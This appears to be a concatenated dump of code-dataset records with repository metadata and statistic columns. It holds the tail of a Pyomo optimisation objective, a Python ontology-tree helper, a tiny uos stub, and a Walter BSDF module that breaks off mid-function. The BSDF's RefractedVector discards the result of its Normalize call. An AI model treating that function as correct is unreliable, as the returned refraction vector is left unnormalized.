0.00287294785493111*m.x777 + 0.00287294785493111*m.x778 + 0.00287294785493111*m.x779 +
0.00287294785493111*m.x780 + 0.00287294785493111*m.x781 + 0.00287294785493111*m.x782 +
0.00287294785493111*m.x783 + 0.00396096877522836*m.x784 + 0.00396096877522836*m.x785 +
0.00396096877522836*m.x786 + 0.00396096877522836*m.x787 + 0.00396096877522836*m.x788 +
0.00396096877522836*m.x789 + 0.00396096877522836*m.x790 + 0.00396096877522836*m.x791 +
0.00396096877522836*m.x792 + 0.00396096877522836*m.x793 + 0.00396096877522836*m.x794 +
0.00396096877522836*m.x795 + 0.00396096877522836*m.x796 + 0.00396096877522836*m.x797 +
0.00396096877522836*m.x798 + 0.00396096877522836*m.x799 + 0.00396096877522836*m.x800 +
0.00396096877522836*m.x801 + 0.00396096877522836*m.x802 + 0.00396096877522836*m.x803 +
0.00396096877522836*m.x804 + 0.00396096877522836*m.x805 + 0.00396096877522836*m.x806 +
0.00396096877522836*m.x807 + 0.00396096877522836*m.x808 + 0.00396096877522836*m.x809 +
0.00396096877522836*m.x810 + 0.00498894544648239*m.x811 + 0.00498894544648239*m.x812 +
0.00498894544648239*m.x813 + 0.00498894544648239*m.x814 + 0.00498894544648239*m.x815 +
0.00498894544648239*m.x816 + 0.00498894544648239*m.x817 + 0.00498894544648239*m.x818 +
0.00498894544648239*m.x819 + 0.00498894544648239*m.x820 + 0.00498894544648239*m.x821 +
0.00498894544648239*m.x822 + 0.00498894544648239*m.x823 + 0.00498894544648239*m.x824 +
0.00498894544648239*m.x825 + 0.00498894544648239*m.x826 + 0.00498894544648239*m.x827 +
0.00498894544648239*m.x828 + 0.00498894544648239*m.x829 + 0.00498894544648239*m.x830 +
0.00498894544648239*m.x831 + 0.00498894544648239*m.x832 + 0.00498894544648239*m.x833 +
0.00498894544648239*m.x834 + 0.00498894544648239*m.x835 + 0.00498894544648239*m.x836 +
0.00498894544648239*m.x837 + 0.00594129479021871*m.x838 + 0.00594129479021871*m.x839 +
0.00594129479021871*m.x840 + 0.00594129479021871*m.x841 + 0.00594129479021871*m.x842 +
0.00594129479021871*m.x843 + 0.00594129479021871*m.x844 + 0.00594129479021871*m.x845 +
0.00594129479021871*m.x846 + 0.00594129479021871*m.x847 + 0.00594129479021871*m.x848 +
0.00594129479021871*m.x849 + 0.00594129479021871*m.x850 + 0.00594129479021871*m.x851 +
0.00594129479021871*m.x852 + 0.00594129479021871*m.x853 + 0.00594129479021871*m.x854 +
0.00594129479021871*m.x855 + 0.00594129479021871*m.x856 + 0.00594129479021871*m.x857 +
0.00594129479021871*m.x858 + 0.00594129479021871*m.x859 + 0.00594129479021871*m.x860 +
0.00594129479021871*m.x861 + 0.00594129479021871*m.x862 + 0.00594129479021871*m.x863 +
0.00594129479021871*m.x864 + 0.00680358016115775*m.x865 + 0.00680358016115775*m.x866 +
0.00680358016115775*m.x867 + 0.00680358016115775*m.x868 + 0.00680358016115775*m.x869 +
0.00680358016115775*m.x870 + 0.00680358016115775*m.x871 + 0.00680358016115775*m.x872 +
0.00680358016115775*m.x873 + 0.00680358016115775*m.x874 + 0.00680358016115775*m.x875 +
0.00680358016115775*m.x876 + 0.00680358016115775*m.x877 + 0.00680358016115775*m.x878 +
0.00680358016115775*m.x879 + 0.00680358016115775*m.x880 + 0.00680358016115775*m.x881 +
0.00680358016115775*m.x882 + 0.00680358016115775*m.x883 + 0.00680358016115775*m.x884 +
0.00680358016115775*m.x885 + 0.00680358016115775*m.x886 + 0.00680358016115775*m.x887 +
0.00680358016115775*m.x888 + 0.00680358016115775*m.x889 + 0.00680358016115775*m.x890 +
0.00680358016115775*m.x891 + 0.00756273019204139*m.x892 + 0.00756273019204139*m.x893 +
0.00756273019204139*m.x894 + 0.00756273019204139*m.x895 + 0.00756273019204139*m.x896 +
0.00756273019204139*m.x897 + 0.00756273019204139*m.x898 + 0.00756273019204139*m.x899 +
0.00756273019204139*m.x900 + 0.00756273019204139*m.x901 + 0.00756273019204139*m.x902 +
0.00756273019204139*m.x903 + 0.00756273019204139*m.x904 + 0.00756273019204139*m.x905 +
0.00756273019204139*m.x906 + 0.00756273019204139*m.x907 + 0.00756273019204139*m.x908 +
0.00756273019204139*m.x909 + 0.00756273019204139*m.x910 + 0.00756273019204139*m.x911 +
0.00756273019204139*m.x912 + 0.00756273019204139*m.x913 + 0.00756273019204139*m.x914 +
0.00756273019204139*m.x915 + 0.00756273019204139*m.x916 + 0.00756273019204139*m.x917 +
0.00756273019204139*m.x918 + 0.00820723694223634*m.x919 + 0.00820723694223634*m.x920 +
0.00820723694223634*m.x921 + 0.00820723694223634*m.x922 + 0.00820723694223634*m.x923 +
0.00820723694223634*m.x924 + 0.00820723694223634*m.x925 + 0.00820723694223634*m.x926 +
0.00820723694223634*m.x927 + 0.00820723694223634*m.x928 + 0.00820723694223634*m.x929 +
0.00820723694223634*m.x930 + 0.00820723694223634*m.x931 + 0.00820723694223634*m.x932 +
0.00820723694223634*m.x933 + 0.00820723694223634*m.x934 + 0.00820723694223634*m.x935 +
0.00820723694223634*m.x936 + 0.00820723694223634*m.x937 + 0.00820723694223634*m.x938 +
0.00820723694223634*m.x939 + 0.00820723694223634*m.x940 + 0.00820723694223634*m.x941 +
0.00820723694223634*m.x942 + 0.00820723694223634*m.x943 + 0.00820723694223634*m.x944 +
0.00820723694223634*m.x945 + 0.00872733034638368*m.x946 + 0.00872733034638368*m.x947 +
0.00872733034638368*m.x948 + 0.00872733034638368*m.x949 + 0.00872733034638368*m.x950 +
0.00872733034638368*m.x951 + 0.00872733034638368*m.x952 + 0.00872733034638368*m.x953 +
0.00872733034638368*m.x954 + 0.00872733034638368*m.x955 + 0.00872733034638368*m.x956 +
0.00872733034638368*m.x957 + 0.00872733034638368*m.x958 + 0.00872733034638368*m.x959 +
0.00872733034638368*m.x960 + 0.00872733034638368*m.x961 + 0.00872733034638368*m.x962 +
0.00872733034638368*m.x963 + 0.00872733034638368*m.x964 + 0.00872733034638368*m.x965 +
0.00872733034638368*m.x966 + 0.00872733034638368*m.x967 + 0.00872733034638368*m.x968 +
0.00872733034638368*m.x969 + 0.00872733034638368*m.x970 + 0.00872733034638368*m.x971 +
0.00872733034638368*m.x972 + 0.00911512631863053*m.x973 + 0.00911512631863053*m.x974 +
0.00911512631863053*m.x975 + 0.00911512631863053*m.x976 + 0.00911512631863053*m.x977 +
0.00911512631863053*m.x978 + 0.00911512631863053*m.x979 + 0.00911512631863053*m.x980 +
0.00911512631863053*m.x981 + 0.00911512631863053*m.x982 + 0.00911512631863053*m.x983 +
0.00911512631863053*m.x984 + 0.00911512631863053*m.x985 + 0.00911512631863053*m.x986 +
0.00911512631863053*m.x987 + 0.00911512631863053*m.x988 + 0.00911512631863053*m.x989 +
0.00911512631863053*m.x990 + 0.00911512631863053*m.x991 + 0.00911512631863053*m.x992 +
0.00911512631863053*m.x993 + 0.00911512631863053*m.x994 + 0.00911512631863053*m.x995 +
0.00911512631863053*m.x996 + 0.00911512631863053*m.x997 + 0.00911512631863053*m.x998 +
0.00911512631863053*m.x999 + 0.0093647462673351*m.x1000 + 0.0093647462673351*m.x1001 +
0.0093647462673351*m.x1002 + 0.0093647462673351*m.x1003 + 0.0093647462673351*m.x1004 +
0.0093647462673351*m.x1005 + 0.0093647462673351*m.x1006 + 0.0093647462673351*m.x1007 +
0.0093647462673351*m.x1008 + 0.0093647462673351*m.x1009 + 0.0093647462673351*m.x1010 +
0.0093647462673351*m.x1011 + 0.0093647462673351*m.x1012 + 0.0093647462673351*m.x1013 +
0.0093647462673351*m.x1014 + 0.0093647462673351*m.x1015 + 0.0093647462673351*m.x1016 +
0.0093647462673351*m.x1017 + 0.0093647462673351*m.x1018 + 0.0093647462673351*m.x1019 +
0.0093647462673351*m.x1020 + 0.0093647462673351*m.x1021 + 0.0093647462673351*m.x1022 +
0.0093647462673351*m.x1023 + 0.0093647462673351*m.x1024 + 0.0093647462673351*m.x1025 +
0.0093647462673351*m.x1026 + 0.00947240620852359*m.x1027 + 0.00947240620852359*m.x1028 +
0.00947240620852359*m.x1029 + 0.00947240620852359*m.x1030 + 0.00947240620852359*m.x1031 +
0.00947240620852359*m.x1032 + 0.00947240620852359*m.x1033 + 0.00947240620852359*m.x1034 +
0.00947240620852359*m.x1035 + 0.00947240620852359*m.x1036 + 0.00947240620852359*m.x1037 +
0.00947240620852359*m.x1038 + 0.00947240620852359*m.x1039 + 0.00947240620852359*m.x1040 +
0.00947240620852359*m.x1041 + 0.00947240620852359*m.x1042 + 0.00947240620852359*m.x1043 +
0.00947240620852359*m.x1044 + 0.00947240620852359*m.x1045 + 0.00947240620852359*m.x1046 +
0.00947240620852359*m.x1047 + 0.00947240620852359*m.x1048 + 0.00947240620852359*m.x1049 +
0.00947240620852359*m.x1050 + 0.00947240620852359*m.x1051 + 0.00947240620852359*m.x1052 +
0.00947240620852359*m.x1053 + 0.00943647412723007*m.x1054 + 0.00943647412723007*m.x1055 +
0.00943647412723007*m.x1056 + 0.00943647412723007*m.x1057 + 0.00943647412723007*m.x1058 +
0.00943647412723007*m.x1059 + 0.00943647412723007*m.x1060 + 0.00943647412723007*m.x1061 +
0.00943647412723007*m.x1062 + 0.00943647412723007*m.x1063 + 0.00943647412723007*m.x1064 +
0.00943647412723007*m.x1065 + 0.00943647412723007*m.x1066 + 0.00943647412723007*m.x1067 +
0.00943647412723007*m.x1068 + 0.00943647412723007*m.x1069 + 0.00943647412723007*m.x1070 +
0.00943647412723007*m.x1071 + 0.00943647412723007*m.x1072 + 0.00943647412723007*m.x1073 +
0.00943647412723007*m.x1074 + 0.00943647412723007*m.x1075 + 0.00943647412723007*m.x1076 +
0.00943647412723007*m.x1077 + 0.00943647412723007*m.x1078 + 0.00943647412723007*m.x1079 +
0.00943647412723007*m.x1080 + 0.00925749471717982*m.x1081 + 0.00925749471717982*m.x1082 +
0.00925749471717982*m.x1083 + 0.00925749471717982*m.x1084 + 0.00925749471717982*m.x1085 +
0.00925749471717982*m.x1086 + 0.00925749471717982*m.x1087 + 0.00925749471717982*m.x1088 +
0.00925749471717982*m.x1089 + 0.00925749471717982*m.x1090 + 0.00925749471717982*m.x1091 +
0.00925749471717982*m.x1092 + 0.00925749471717982*m.x1093 + 0.00925749471717982*m.x1094 +
0.00925749471717982*m.x1095 + 0.00925749471717982*m.x1096 + 0.00925749471717982*m.x1097 +
0.00925749471717982*m.x1098 + 0.00925749471717982*m.x1099 + 0.00925749471717982*m.x1100 +
0.00925749471717982*m.x1101 + 0.00925749471717982*m.x1102 + 0.00925749471717982*m.x1103 +
0.00925749471717982*m.x1104 + 0.00925749471717982*m.x1105 + 0.00925749471717982*m.x1106 +
0.00925749471717982*m.x1107 + 0.00893818112378762*m.x1108 + 0.00893818112378762*m.x1109 +
0.00893818112378762*m.x1110 + 0.00893818112378762*m.x1111 + 0.00893818112378762*m.x1112 +
0.00893818112378762*m.x1113 + 0.00893818112378762*m.x1114 + 0.00893818112378762*m.x1115 +
0.00893818112378762*m.x1116 + 0.00893818112378762*m.x1117 + 0.00893818112378762*m.x1118 +
0.00893818112378762*m.x1119 + 0.00893818112378762*m.x1120 + 0.00893818112378762*m.x1121 +
0.00893818112378762*m.x1122 + 0.00893818112378762*m.x1123 + 0.00893818112378762*m.x1124 +
0.00893818112378762*m.x1125 + 0.00893818112378762*m.x1126 + 0.00893818112378762*m.x1127 +
0.00893818112378762*m.x1128 + 0.00893818112378762*m.x1129 + 0.00893818112378762*m.x1130 +
0.00893818112378762*m.x1131 + 0.00893818112378762*m.x1132 + 0.00893818112378762*m.x1133 +
0.00893818112378762*m.x1134 + 0.00848337381563895*m.x1135 + 0.00848337381563895*m.x1136 +
0.00848337381563895*m.x1137 + 0.00848337381563895*m.x1138 + 0.00848337381563895*m.x1139 +
0.00848337381563895*m.x1140 + 0.00848337381563895*m.x1141 + 0.00848337381563895*m.x1142 +
0.00848337381563895*m.x1143 + 0.00848337381563895*m.x1144 + 0.00848337381563895*m.x1145 +
0.00848337381563895*m.x1146 + 0.00848337381563895*m.x1147 + 0.00848337381563895*m.x1148 +
0.00848337381563895*m.x1149 + 0.00848337381563895*m.x1150 + 0.00848337381563895*m.x1151 +
0.00848337381563895*m.x1152 + 0.00848337381563895*m.x1153 + 0.00848337381563895*m.x1154 +
0.00848337381563895*m.x1155 + 0.00848337381563895*m.x1156 + 0.00848337381563895*m.x1157 +
0.00848337381563895*m.x1158 + 0.00848337381563895*m.x1159 + 0.00848337381563895*m.x1160 +
0.00848337381563895*m.x1161 + 0.00789996720792031*m.x1162 + 0.00789996720792031*m.x1163 +
0.00789996720792031*m.x1164 + 0.00789996720792031*m.x1165 + 0.00789996720792031*m.x1166 +
0.00789996720792031*m.x1167 + 0.00789996720792031*m.x1168 + 0.00789996720792031*m.x1169 +
0.00789996720792031*m.x1170 + 0.00789996720792031*m.x1171 + 0.00789996720792031*m.x1172 +
0.00789996720792031*m.x1173 + 0.00789996720792031*m.x1174 + 0.00789996720792031*m.x1175 +
0.00789996720792031*m.x1176 + 0.00789996720792031*m.x1177 + 0.00789996720792031*m.x1178 +
0.00789996720792031*m.x1179 + 0.00789996720792031*m.x1180 + 0.00789996720792031*m.x1181 +
0.00789996720792031*m.x1182 + 0.00789996720792031*m.x1183 + 0.00789996720792031*m.x1184 +
0.00789996720792031*m.x1185 + 0.00789996720792031*m.x1186 + 0.00789996720792031*m.x1187 +
0.00789996720792031*m.x1188 + 0.00719680515011276*m.x1189 + 0.00719680515011276*m.x1190 +
0.00719680515011276*m.x1191 + 0.00719680515011276*m.x1192 + 0.00719680515011276*m.x1193 +
0.00719680515011276*m.x1194 + 0.00719680515011276*m.x1195 + 0.00719680515011276*m.x1196 +
0.00719680515011276*m.x1197 + 0.00719680515011276*m.x1198 + 0.00719680515011276*m.x1199 +
0.00719680515011276*m.x1200 + 0.00719680515011276*m.x1201 + 0.00719680515011276*m.x1202 +
0.00719680515011276*m.x1203 + 0.00719680515011276*m.x1204 + 0.00719680515011276*m.x1205 +
0.00719680515011276*m.x1206 + 0.00719680515011276*m.x1207 + 0.00719680515011276*m.x1208 +
0.00719680515011276*m.x1209 + 0.00719680515011276*m.x1210 + 0.00719680515011276*m.x1211 +
0.00719680515011276*m.x1212 + 0.00719680515011276*m.x1213 + 0.00719680515011276*m.x1214 +
0.00719680515011276*m.x1215 + 0.00638454686224871*m.x1216 + 0.00638454686224871*m.x1217 +
0.00638454686224871*m.x1218 + 0.00638454686224871*m.x1219 + 0.00638454686224871*m.x1220 +
0.00638454686224871*m.x1221 + 0.00638454686224871*m.x1222 + 0.00638454686224871*m.x1223 +
0.00638454686224871*m.x1224 + 0.00638454686224871*m.x1225 + 0.00638454686224871*m.x1226 +
0.00638454686224871*m.x1227 + 0.00638454686224871*m.x1228 + 0.00638454686224871*m.x1229 +
0.00638454686224871*m.x1230 + 0.00638454686224871*m.x1231 + 0.00638454686224871*m.x1232 +
0.00638454686224871*m.x1233 + 0.00638454686224871*m.x1234 + 0.00638454686224871*m.x1235 +
0.00638454686224871*m.x1236 + 0.00638454686224871*m.x1237 + 0.00638454686224871*m.x1238 +
0.00638454686224871*m.x1239 + 0.00638454686224871*m.x1240 + 0.00638454686224871*m.x1241 +
0.00638454686224871*m.x1242 + 0.0054755053520017*m.x1243 + 0.0054755053520017*m.x1244 +
0.0054755053520017*m.x1245 + 0.0054755053520017*m.x1246 + 0.0054755053520017*m.x1247 +
0.0054755053520017*m.x1248 + 0.0054755053520017*m.x1249 + 0.0054755053520017*m.x1250 +
0.0054755053520017*m.x1251 + 0.0054755053520017*m.x1252 + 0.0054755053520017*m.x1253 +
0.0054755053520017*m.x1254 + 0.0054755053520017*m.x1255 + 0.0054755053520017*m.x1256 +
0.0054755053520017*m.x1257 + 0.0054755053520017*m.x1258 + 0.0054755053520017*m.x1259 +
0.0054755053520017*m.x1260 + 0.0054755053520017*m.x1261 + 0.0054755053520017*m.x1262 +
0.0054755053520017*m.x1263 + 0.0054755053520017*m.x1264 + 0.0054755053520017*m.x1265 +
0.0054755053520017*m.x1266 + 0.0054755053520017*m.x1267 + 0.0054755053520017*m.x1268 +
0.0054755053520017*m.x1269 + 0.00448346076204115*m.x1270 + 0.00448346076204115*m.x1271 +
0.00448346076204115*m.x1272 + 0.00448346076204115*m.x1273 + 0.00448346076204115*m.x1274 +
0.00448346076204115*m.x1275 + 0.00448346076204115*m.x1276 + 0.00448346076204115*m.x1277 +
0.00448346076204115*m.x1278 + 0.00448346076204115*m.x1279 + 0.00448346076204115*m.x1280 +
0.00448346076204115*m.x1281 + 0.00448346076204115*m.x1282 + 0.00448346076204115*m.x1283 +
0.00448346076204115*m.x1284 + 0.00448346076204115*m.x1285 + 0.00448346076204115*m.x1286 +
0.00448346076204115*m.x1287 + 0.00448346076204115*m.x1288 + 0.00448346076204115*m.x1289 +
0.00448346076204115*m.x1290 + 0.00448346076204115*m.x1291 + 0.00448346076204115*m.x1292 +
0.00448346076204115*m.x1293 + 0.00448346076204115*m.x1294 + 0.00448346076204115*m.x1295 +
0.00448346076204115*m.x1296 + 0.00342345147711632*m.x1297 + 0.00342345147711632*m.x1298 +
0.00342345147711632*m.x1299 + 0.00342345147711632*m.x1300 + 0.00342345147711632*m.x1301 +
0.00342345147711632*m.x1302 + 0.00342345147711632*m.x1303 + 0.00342345147711632*m.x1304 +
0.00342345147711632*m.x1305 + 0.00342345147711632*m.x1306 + 0.00342345147711632*m.x1307 +
0.00342345147711632*m.x1308 + 0.00342345147711632*m.x1309 + 0.00342345147711632*m.x1310 +
0.00342345147711632*m.x1311 + 0.00342345147711632*m.x1312 + 0.00342345147711632*m.x1313 +
0.00342345147711632*m.x1314 + 0.00342345147711632*m.x1315 + 0.00342345147711632*m.x1316 +
0.00342345147711632*m.x1317 + 0.00342345147711632*m.x1318 + 0.00342345147711632*m.x1319 +
0.00342345147711632*m.x1320 + 0.00342345147711632*m.x1321 + 0.00342345147711632*m.x1322 +
0.00342345147711632*m.x1323 + 0.00231154615747269*m.x1324 + 0.00231154615747269*m.x1325 +
0.00231154615747269*m.x1326 + 0.00231154615747269*m.x1327 + 0.00231154615747269*m.x1328 +
0.00231154615747269*m.x1329 + 0.00231154615747269*m.x1330 + 0.00231154615747269*m.x1331 +
0.00231154615747269*m.x1332 + 0.00231154615747269*m.x1333 + 0.00231154615747269*m.x1334 +
0.00231154615747269*m.x1335 + 0.00231154615747269*m.x1336 + 0.00231154615747269*m.x1337 +
0.00231154615747269*m.x1338 + 0.00231154615747269*m.x1339 + 0.00231154615747269*m.x1340 +
0.00231154615747269*m.x1341 + 0.00231154615747269*m.x1342 + 0.00231154615747269*m.x1343 +
0.00231154615747269*m.x1344 + 0.00231154615747269*m.x1345 + 0.00231154615747269*m.x1346 +
0.00231154615747269*m.x1347 + 0.00231154615747269*m.x1348 + 0.00231154615747269*m.x1349 +
0.00231154615747269*m.x1350 + 0.00116460015434218*m.x1351 + 0.00116460015434218*m.x1352 +
0.00116460015434218*m.x1353 + 0.00116460015434218*m.x1354 + 0.00116460015434218*m.x1355 +
0.00116460015434218*m.x1356 + 0.00116460015434218*m.x1357 + 0.00116460015434218*m.x1358 +
0.00116460015434218*m.x1359 + 0.00116460015434218*m.x1360 + 0.00116460015434218*m.x1361 +
0.00116460015434218*m.x1362 + 0.00116460015434218*m.x1363 + 0.00116460015434218*m.x1364 +
0.00116460015434218*m.x1365 + 0.00116460015434218*m.x1366 + 0.00116460015434218*m.x1367 +
0.00116460015434218*m.x1368 + 0.00116460015434218*m.x1369 + 0.00116460015434218*m.x1370 +
0.00116460015434218*m.x1371 + 0.00116460015434218*m.x1372 + 0.00116460015434218*m.x1373 +
0.00116460015434218*m.x1374 + 0.00116460015434218*m.x1375 + 0.00116460015434218*m.x1376 +
0.00116460015434218*m.x1377 - 1.3235376744968e-16*m.x1378 - 1.3235376744968e-16*m.x1379 -
1.3235376744968e-16*m.x1380 - 1.3235376744968e-16*m.x1381 - 1.3235376744968e-16*m.x1382 -
1.3235376744968e-16*m.x1383 - 1.3235376744968e-16*m.x1384 - 1.3235376744968e-16*m.x1385 -
1.3235376744968e-16*m.x1386 - 1.3235376744968e-16*m.x1387 - 1.3235376744968e-16*m.x1388 -
1.3235376744968e-16*m.x1389 - 1.3235376744968e-16*m.x1390 - 1.3235376744968e-16*m.x1391 -
1.3235376744968e-16*m.x1392 - 1.3235376744968e-16*m.x1393 - 1.3235376744968e-16*m.x1394 -
1.3235376744968e-16*m.x1395 - 1.3235376744968e-16*m.x1396 - 1.3235376744968e-16*m.x1397 -
1.3235376744968e-16*m.x1398 - 1.3235376744968e-16*m.x1399 - 1.3235376744968e-16*m.x1400 -
1.3235376744968e-16*m.x1401 - 1.3235376744968e-16*m.x1402 - 1.3235376744968e-16*m.x1403 -
1.3235376744968e-16*m.x1404, sense=minimize)
| 100.268361 | 120 | 0.577811 | 73,339 | 501,041 | 3.947518 | 0.022539 | 0.274812 | 0.293133 | 0.036642 | 0.852743 | 0.820902 | 0.660723 | 0.483297 | 0.210309 | 0.112346 | 0 | 0.556668 | 0.227983 | 501,041 | 4,996 | 121 | 100.288431 | 0.191775 | 0.001353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.000201 | 0 | 0.000201 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8238e1e6a669d82e4d3b8e2a9e414c41a47d7394 | 1,142 | py | Python | tools/intogen/runtime/pyenv/lib/python2.7/site-packages/bgcore/obo/tree.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | 1 | 2021-02-05T13:19:58.000Z | 2021-02-05T13:19:58.000Z | tools/intogen/runtime/pyenv/lib/python2.7/site-packages/bgcore/obo/tree.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | null | null | null | tools/intogen/runtime/pyenv/lib/python2.7/site-packages/bgcore/obo/tree.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | null | null | null | def ascendant(ontology, rel="is_a"):
asc_tree = {}
for term in ontology.get_stanzas("term"):
term_id = term.get_id()
if term.contains_tag(rel):
for isa in term.get_tag(rel):
parent = isa.content
if term_id not in asc_tree:
asc_tree[term_id] = [parent]
else:
asc_tree[term_id] += [parent]
return asc_tree
def descendant(ontology, rel="is_a"):
des_tree = {}
for term in ontology.get_stanzas("term"):
term_id = term.get_id()
if term.contains_tag(rel):
for isa in term.get_tag(rel):
parent = isa.content
if parent not in des_tree:
des_tree[parent] = [term_id]
else:
des_tree[parent] += [term_id]
return des_tree
def all(ontology, rel="is_a"):
asc_tree = {}
des_tree = {}
for term in ontology.get_stanzas("term"):
term_id = term.get_id()
if term.contains_tag(rel):
for isa in term.get_tag(rel):
parent = isa.content
if term_id not in asc_tree:
asc_tree[term_id] = [parent]
else:
asc_tree[term_id] += [parent]
if parent not in des_tree:
des_tree[parent] = [term_id]
else:
des_tree[parent] += [term_id]
return (asc_tree, des_tree)
| 25.377778 | 42 | 0.658494 | 188 | 1,142 | 3.744681 | 0.138298 | 0.110795 | 0.0625 | 0.073864 | 0.887784 | 0.887784 | 0.833807 | 0.833807 | 0.833807 | 0.833807 | 0 | 0 | 0.211909 | 1,142 | 44 | 43 | 25.954545 | 0.782222 | 0 | 0 | 0.853659 | 0 | 0 | 0.021016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0 | 0 | 0.146341 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ec2069dae83b79186a15cb8cfe0d9b45d6f9bb24 | 33 | py | Python | mp-tests/stubs/uos.py | markpatterson27/Project-Hand-Sanitiser-Level-Monitor | b6e3feb775ac21576f14aa2d9b98300086839080 | [
"MIT"
] | null | null | null | mp-tests/stubs/uos.py | markpatterson27/Project-Hand-Sanitiser-Level-Monitor | b6e3feb775ac21576f14aa2d9b98300086839080 | [
"MIT"
] | null | null | null | mp-tests/stubs/uos.py | markpatterson27/Project-Hand-Sanitiser-Level-Monitor | b6e3feb775ac21576f14aa2d9b98300086839080 | [
"MIT"
] | null | null | null | def uname():
return ('test',) | 16.5 | 20 | 0.545455 | 4 | 33 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212121 | 33 | 2 | 20 | 16.5 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
ec559d8fb0531812eed82332d918beb74cca1eb6 | 23,803 | py | Python | walter.py | xiamengqi2012/RealNVPBRDF | 01a4bf17c2e6eedae80a3269e3075df266dc5a70 | [
"MIT"
] | null | null | null | walter.py | xiamengqi2012/RealNVPBRDF | 01a4bf17c2e6eedae80a3269e3075df266dc5a70 | [
"MIT"
] | null | null | null | walter.py | xiamengqi2012/RealNVPBRDF | 01a4bf17c2e6eedae80a3269e3075df266dc5a70 | [
"MIT"
] | null | null | null |
import numpy as np
# Walter BSDF evaluation and sampling.
# Implementation ported from RIS walterbxdf.h and support files
# All these functions work for arrays.
# indexing expression to add a singleton dimension at the end
nax = (..., np.newaxis)
def SQRT(x): return np.sqrt(x)
def MAX(a,b): return np.maximum(a, b)
def SINCOS(t): return (np.sin(t), np.cos(t))
def ABS(x): return np.abs(x)
def SIGN(x): return np.sign(x)
def makeRtVector3(x, y, z):
return np.stack((x, y, z), -1)
def makeRtColorRGB(c):
return np.stack((c, c, c), -1)
def Dot(u, v):
return (u * v).sum(-1)
def Max(u):
return np.amax(u, -1)
def Normalize(u):
return u / np.sqrt(Dot(u, u))[...,np.newaxis]
def SphericalDirection( sintheta, costheta, phi ):
sinphi, cosphi = SINCOS( phi );
return makeRtVector3( sintheta * cosphi, sintheta * sinphi, costheta )
def ReflectedVector( V, H, VdotH ):
return 2.0 * VdotH[...,np.newaxis] * H - V
def RefractedVector( V, H, VdotH, VdotN, eta ):
# eta is a scalar
ieta = 1.0 / eta
coef = VdotH * ieta - SIGN( VdotN ) * SQRT( 1.0 + ( VdotH*VdotH-1.0 ) * ( ieta*ieta ) )
res = coef[...,np.newaxis] * H - V*ieta
Normalize( res )
return res
def fresnel(n_i, n_t, mu_i):
lm_t2 = (n_i / n_t)**2 * (1 - mu_i**2)
mu_t = np.sqrt(1 - np.minimum(lm_t2, 1))
R_s = ((n_i * mu_i - n_t * mu_t) / (n_i * mu_i + n_t * mu_t))**2
R_p = ((n_i * mu_t - n_t * mu_i) / (n_i * mu_t + n_t * mu_i))**2
return np.select([mu_i > 0], [(R_s + R_p) / 2], 1.0)
def Fresnel( VdotH, eta ):
return fresnel(1.0, eta, VdotH)
def chi_plus(x):
return np.where(x > 0, 1, 0)
def sampleH(roughness2, xi0, xi1, dist):
if dist == 'G':
# GGX
# Sample angle theta: eq 35
tantheta2 = roughness2 * xi0 / ( 1.0 - xi0 )
costheta2 = 1.0 / ( 1.0 + tantheta2 )
costheta = SQRT( costheta2 )
sintheta = SQRT( MAX( 0.0, 1.0 - costheta2 ) )
elif dist == 'B':
# Beckmann
# sample angle theta: eq 28
tantheta2 = -roughness2 * np.log(1-xi0)
costheta2 = 1.0 / ( 1.0 + tantheta2 )
costheta = SQRT( costheta2 )
sintheta = SQRT( MAX( 0.0, 1.0 - costheta2 ) )
else:
raise ValueError('dist is neither G nor B')
return (SphericalDirection( sintheta, costheta, 2 * np.pi * xi1 ), costheta)
def BeckmannG1(value, a):
return chi_plus(value) * (3.535*a + 2.181*a*a)/(1 + 2.276*a + 2.577*a*a)
def BeckmannG2(value):
return chi_plus(value)
def evaluate(roughness, eta, wo, wi, dist):
# return brdf value (didn't multiply cos)
"""Evaluate BRDF and PDFs for Walter BxDF."""
# eta is assumed > 1, and it is the refractive index of the side of the
# surface facing away from the normal.
rGain = 1.0
boostReflect = 1.0
tAlbedo = np.array((1.0, 1.0, 1.0))
# Convention is for forward path tracing; "i" is the viewer and "o" is the light.
VdotN = wi[...,2]
LdotN = wo[...,2]
isRefraction = ( LdotN*VdotN < 0.0 )
# Refractive indices for the two sides. eta_o is the index for the side
# opposite wi, even when wo is on the same side.
eta_i = np.where(VdotN > 0, 1.0, eta)
eta_o = np.where(VdotN > 0, eta, 1.0)
# Half vector.
H = np.where(isRefraction[nax],
-(eta_o[nax] * wo + eta_i[nax] * wi),
SIGN(VdotN)[nax] * (wo + wi))
H = Normalize( H )
# check side for H
correct = H[...,2] * wi[...,2] > 0
VdotH = Dot( wi, H )
absVdotH = ABS( VdotH )
LdotH = Dot( wo, H )
absLdotH = ABS( LdotH )
# This seems always to compute Fresnel factor for the ray coming from outside.
#F = Fresnel( absVdotH, eta )
